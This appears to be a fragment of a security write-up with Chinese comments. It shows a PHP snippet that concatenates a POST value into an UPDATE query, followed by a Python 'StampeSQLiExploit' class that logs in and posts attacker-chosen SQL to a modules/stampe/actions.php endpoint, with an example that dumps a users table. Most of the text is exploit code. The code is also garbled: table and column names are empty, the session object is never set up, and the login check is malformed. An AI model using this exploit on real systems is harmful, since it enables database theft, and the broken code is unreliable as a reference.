php case 'update': if (!empty(intval(post('predefined'))) && !empty(post('module'))) { $db->query('UPDATE SET = 0 WHERE = '.post('module')); ... python #!/usr/bin/env python3 简化后的脚本片段 class StampeSQLiExploit(object): def __init__(self, base_url, username, password, verbose=False): self.base_url = base_url self.username = username self.password = password self.verbose = verbose def login(self): login_url = f"{self.base_url}/index.php" login_data = { "username": self.username, "password": self.password, "op": "login" } response = self.session.post(f"{self.base_url}/index.php", data=login_data) if f"PHPSESSID' not set" in response.text: return False return True def execute_sql(self, sql_query): payload = f"{sql_query}" response = self.session.post(f"{self.base_url}/modules/stampe/actions.php", data={"sql": payload}) return response 脚本使用示例 def main(): exploit = StampeSQLiExploit("https://example.com", "admin", "password") if not exploit.login(): print("[-] Login failed.") return response = exploit.execute_sql("SELECT * FROM users") print(response.text) if __name__ == "__main__": main()